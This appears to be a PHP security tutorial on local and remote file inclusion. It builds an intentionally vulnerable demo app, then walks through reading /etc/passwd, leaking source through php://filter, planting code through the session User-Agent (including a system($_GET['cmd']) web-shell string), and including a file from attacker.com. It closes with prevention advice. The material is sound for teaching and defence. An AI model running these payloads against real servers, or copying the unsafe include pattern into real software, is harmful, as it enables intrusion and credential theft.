Understanding how LFI/RFI exploits work

Web application hacking often seems elusive to developers who haven't invested time in studying the attacks. In this post, we explore a common attack vector in PHP applications: file inclusion exploits. To start off, let's go over the vocabulary you'll need:

LFI (Local File Inclusion): A vulnerability allowing the inclusion (i.e. reading/execution) of a file on the same server, often caused by unsanitized user input to include() and require() functions.
RFI (Remote File Inclusion): Same as LFI, but allowing the inclusion of files from different servers than the one being exploited (for example over http or ftp).
RCE (Remote Code Execution): A vulnerability that allows the execution of arbitrary code on the target server.

Creating a vulnerable sample app

To get a better understanding of the issue (and give you something to play around with when you're done reading), we will create a quick sample app. Put the following files in the same directory:

index.php

<?php
   const ADMIN_PASSWORD = "mysecretpassword";
   session_start();
   if(!isset($_SESSION["loggedin"])){
      $_SESSION["loggedin"] = false;
   }
   $_SESSION["useragent"] = $_SERVER["HTTP_USER_AGENT"];
   $_SESSION["login_error"] = "";
   if(isset($_POST["pass"])){
      if($_POST["pass"] == ADMIN_PASSWORD){
         $_SESSION["loggedin"] = true;
      }else{
         $_SESSION["login_error"] = "Wrong password!";
      }
   }
   if(isset($_POST["logout"])){
      $_SESSION["loggedin"] = false;
   }
?>
<!Doctype html>
<html>
   <head>
      <style>
         html, body{
            padding:0px;
            margin:0px;
         }
         .wrapper{
            display:flex;
         }
         .nav{
            background:green;
            width:200px;
            height:100%;
            min-height:100vh;
            box-sizing:border-box;
            padding-top:50px;
         }
         .nav a{
            display:block;
            padding:10px 30px;
            color:white;
            text-decoration:none;
            border-left:1px solid darkgreen;
         }
         .nav a:hover{
            background: darkgreen;
         }
         .content{
            width:100%;
            box-sizing:border-box;
            padding:50px;
         }
      </style>
   </head>
   <body>
      <div class="wrapper">
         <div class="nav">
            <a href="?">Home</a>
            <a href="?page=about.php">About</a>
            <a href="?page=admin.php">Admin</a>
         </div>
         <div class="content">
            <?php 
               $page = "home.php";
               if(isset($_GET["page"])){
                  $page = $_GET["page"];
               }
               include($page);
            ?>
         </div>
      </div>
   </body>
</html>

about.php

<h1>About us</h1>

admin.php

<h1>Admin area</h1>
<?php
   if($_SESSION["loggedin"]){?>
      Hello admin!
      <form action="" method="post">
         <input type="hidden" name="logout" value="true">
         <button>Logout</button>
      </form>
   <?php
   }else{
   ?>
      Authentication required
      <form action="" method="post">
         <input type="text" name="pass" placeholder="Password" required>
         <button>Submit</button>
      </form>
      <?php
         if($_SESSION["login_error"] != ""){
            echo "<div style='color:red'>Login failed: ".$_SESSION["login_error"]."</div>";
         }
      ?>
   <?php
   }
?>

This application is intentionally very basic. It is a simplified example of unsafe include() usage meant to illustrate the underlying issue. Real-world applications may be much more complex, but the problem with passing user input to include() and require() remains the same no matter the complexity.

To start a local web server without having to actually install PHP and a web server, we can use a quick Docker one-liner:

docker run --rm -v "$PWD":/var/www/html -p 8000:80 php:8.0-apache

You can now access the demo app at http://127.0.0.1:8000/.

Exploiting the LFI vulnerability

When looking at the application from the outside (assuming you don't know the source code yet), there isn't much to see: a little text and an admin login. The interesting part is how the URLs are set up:

http://127.0.0.1:8000/?page=about.php

File endings in URL parameters are immediately suspicious. And as you might expect, by changing the path to something different, we can make the application include other files from the server's hard drive instead of the intended PHP contents:

http://127.0.0.1:8000/?page=/etc/passwd

Simply by changing the url parameters, we can now read the /etc/passwd file of the server, which contains information about which user accounts exist, where their home directories are and what shells they are assigned.

Our main target for the demo app is to get access to the admin area, which is slightly more tricky. Simply requesting index.php executes the file and only sends us its output, but we want to read the source code. We can use a little trick to get around this: PHP's built-in stream wrappers. The php://filter wrapper lets us run the file's contents through the convert.base64-encode filter before include() sees them. The encoded result no longer contains any PHP tags, so include() prints it instead of executing it:

http://127.0.0.1:8000/?page=php://filter/read=convert.base64-encode/resource=index.php

Now we just copy that base64 output string and decode it:

echo '...base64 string here...' | base64 -d > out.php

and we're in possession of the source code (in the file out.php) - which happens to include the admin password.
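
The effect of the filter can be reproduced locally without a web server. The following is a minimal sketch: the temporary file and its contents are hypothetical stand-ins for index.php, and file_get_contents() is used in place of include() so that the encoded data can be captured in a variable.

```php
<?php
// Hypothetical stand-in for index.php: a PHP file containing a secret.
$source = '<?php const ADMIN_PASSWORD = "mysecretpassword"; ?>';
$path = tempnam(sys_get_temp_dir(), 'lfi_demo_');
file_put_contents($path, $source);

// Reading through php://filter applies convert.base64-encode to the raw
// bytes of the file. The result contains no PHP opening tag anymore, so
// include() would treat it as plain text and simply print it.
$encoded = file_get_contents(
    'php://filter/read=convert.base64-encode/resource=' . $path
);

// Decoding restores the original source, just like `base64 -d` does.
$decoded = base64_decode($encoded);

unlink($path);

echo $encoded, PHP_EOL;
echo $decoded, PHP_EOL;
```

The first line printed is the kind of string the vulnerable page would show in the browser, the second is the recovered source.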

What makes LFIs so dangerous?

Truth be told, exploiting an LFI vulnerability is rarely this straightforward and won't usually grant access on its own like it did in our case. It is more common for an LFI to be used for fingerprinting (finding information about the target) that can then be used to get better access to the server, for example:

check files like /etc/passwd for the names and home directories of user accounts
check config files for php (php.ini), web servers (nginx/apache2) and networked services (sshd/ftp)
check if immediate access can be gained, like some user's private ssh key (~/.ssh/id_rsa) being readable, which could be used to log in over ssh
check source code of script files like php and python for credentials to file storage or databases
check history files like ~/.bash_history for commands run by users that expose more information, like service hosts/passwords or directories

The list above is a quick starting point for what an attacker might look for with nothing but read-only access to a system. What exactly will be useful depends on the target system, what software is installed and how it was configured.

Getting from LFI to RCE

A very common next step after finding an LFI exploit is to try and use it to execute arbitrary code on the server. The LFI alone can't be used for that, because while it will happily execute any code it finds in the files we specify, those files have to somehow get onto the server first. Our demo app doesn't have any means of file upload, so how would an attacker go about writing files when all they can seemingly do is read them?

As it turns out, there are several files being written all the time on web servers that include some input from users: web server log files, session data, error messages, ... the list goes on. Now that we have the source code of index.php from our demo app, we can also see it storing some session data about us:

$_SESSION["useragent"] = $_SERVER["HTTP_USER_AGENT"];

What seems innocent at first is another unsanitized user input. The User-Agent HTTP header is sent by the client (us) to the server and not validated anywhere. It could be any string, for example <?php system($_GET['cmd']); ?>. Session data assigned to the $_SESSION variable is stored in files in a temporary directory, /tmp/sess_{SESSION_ID} by default (an attacker can confirm the location by using the LFI to read the session.save_path setting in php.ini). We can get the session ID from the PHPSESSID cookie handed to us by the server. The following request plants a harmless phpinfo() payload as our User-Agent and saves the cookie:

wget --keep-session-cookies --save-cookies=cookies.txt --user-agent='<?php phpinfo(); ?>' http://127.0.0.1:8000 -O /dev/null

This creates a file cookies.txt which contains the session ID at the end:

# HTTP Cookie File
# Generated by Wget on 2023-06-20 08:06:54.
# Edit at your own risk.

127.0.0.1:8000   FALSE   /   FALSE   0   PHPSESSID   a904f281e6e1145501cbb321d1b52990

In our case, the session ID assigned to us by the server is a904f281e6e1145501cbb321d1b52990 - it will be different every time you run this command. Knowing that the server's default config saves session files to /tmp, it should have created the file /tmp/sess_a904f281e6e1145501cbb321d1b52990 containing, among other data, our exploit code <?php phpinfo(); ?>.
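
For orientation, the contents of that session file can be approximated as follows. This is a sketch assuming PHP's default "php" session serialize handler, which stores each top-level key as name|serialized-value; the helper name encode_session_like_php() is made up for this illustration, since on a real server PHP writes the file itself.

```php
<?php
// Hypothetical helper mimicking the default "php" session.serialize_handler:
// every top-level key is written as  key|serialize(value).
function encode_session_like_php(array $session): string
{
    $out = '';
    foreach ($session as $key => $value) {
        $out .= $key . '|' . serialize($value);
    }
    return $out;
}

// The three values index.php stores for a first-time visitor whose
// User-Agent header carries the payload.
$session = [
    'loggedin'    => false,
    'useragent'   => '<?php phpinfo(); ?>',
    'login_error' => '',
];

echo encode_session_like_php($session), PHP_EOL;
```

The payload ends up verbatim between the quotes of the useragent entry. When the file is included, PHP prints the surrounding text as plain output and executes whatever sits between the PHP tags.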

To run our exploit using the LFI we found earlier, simply include that file:

wget --keep-session-cookies --load-cookies=cookies.txt 'http://127.0.0.1:8000/?page=/tmp/sess_a904f281e6e1145501cbb321d1b52990' -O -

This will print the server's entire PHP configuration to our terminal. If you prefer to view it in your browser, you can just open http://127.0.0.1:8000/?page=/tmp/sess_a904f281e6e1145501cbb321d1b52990 to see the info formatted a little more nicely (remember to replace the session ID at the end with the one you were assigned). We can now execute any code we want on the server, the very definition of a Remote Code Execution (RCE) exploit. Usually, an attacker would now upload a script that allows for easier exploration of the server's contents, like a remote shell or a more sophisticated backdoor script.

What about RFI?

Remote file inclusion is a lot less common in the wild (although it does happen occasionally). The main reason is that PHP's default configuration does not allow RFI exploits. To successfully execute one, allow_url_include must be On in php.ini (it is Off by default); including http:// or ftp:// URLs additionally requires allow_url_fopen, which is On by default.

A remote file inclusion is the equivalent of an LFI with RCE, without needing to find a way to write to the server's files first, because we hand the server a remote file (from some other server). If allow_url_include were On for some reason, the include() call could be used to run arbitrary code in a number of ways:

http://127.0.0.1:8000/?page=http://attacker.com/malicious.php

This loads the PHP file malicious.php from the attacker's server and executes it.

http://127.0.0.1:8000/?page=data:text/plain,<?php phpinfo(); ?>

This directly runs the phpinfo() function. If that is filtered, we could encode it as base64 instead:

http://127.0.0.1:8000/?page=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==

Or to be more stealthy, we could use php://input with a POST request and send our php code in the body:

http://127.0.0.1:8000/?page=php://input

Unlike the previous methods, this one is much harder to spot in the web server's access logs, because request bodies are usually not logged.
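
Whether any of the URLs above would work on a given server depends on its php.ini. A minimal sketch for checking the two relevant settings from within PHP could look like this; the function name url_include_settings() is hypothetical, while ini_get() and filter_var() are standard PHP functions.

```php
<?php
// Report the two php.ini switches that decide whether include() accepts
// URL-style wrappers. ini_get() returns the raw setting as a string
// (or false if the setting does not exist in this PHP build).
function url_include_settings(): array
{
    $settings = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $name) {
        $raw = ini_get($name);
        // FILTER_VALIDATE_BOOLEAN maps "1", "On", "true" and "yes" to true
        // and everything else (including "", "0", "Off") to false.
        $settings[$name] = filter_var($raw, FILTER_VALIDATE_BOOLEAN);
    }
    return $settings;
}

foreach (url_include_settings() as $name => $enabled) {
    echo $name, ' = ', $enabled ? 'On' : 'Off', PHP_EOL;
}
```

If allow_url_include is reported as On without a very good reason, turning it Off removes this whole class of attack.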

How to prevent LFI/RFI exploits

The most important lesson to learn from this is: Never trust user input. Not the username typed in the login field, not the seemingly unimportant language setting, not the URL they used to reach you and certainly not HTTP headers from their browser.

Try not to include files based on user-controllable input. If you have to do it, sanitize the input using functions like filter_var(), realpath() (or their equivalents in other languages) - or even better, use enums or arrays of allowed values and disallow everything you didn't specifically allow. Security vulnerabilities are just another type of bug, caused by an error in your code. Now that you understand how this particular bug happens, you should have all you need to prevent it from getting into your future projects.
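
As an illustration of the allowlist approach, here is a minimal sketch of how the demo app's include could be hardened. The constant ALLOWED_PAGES and the helper resolve_page() are names invented for this example, and it assumes the navigation links are changed to ?page=about and ?page=admin (without the file ending).

```php
<?php
// Map of public page names to the files they are allowed to load.
// Anything not listed here can never reach include().
const ALLOWED_PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
    'admin' => 'admin.php',
];

// Hypothetical helper: turn the raw ?page= value into a safe file name,
// falling back to the home page for missing or unknown input.
function resolve_page(mixed $requested): string
{
    if (is_string($requested) && array_key_exists($requested, ALLOWED_PAGES)) {
        return ALLOWED_PAGES[$requested];
    }
    return ALLOWED_PAGES['home'];
}

// In index.php this would replace the unchecked include($page):
// include __DIR__ . '/' . resolve_page($_GET['page'] ?? null);
```

Because the user only ever selects a key and never supplies a path, values like /etc/passwd, php://filter/... or a session file path simply fall through to the home page.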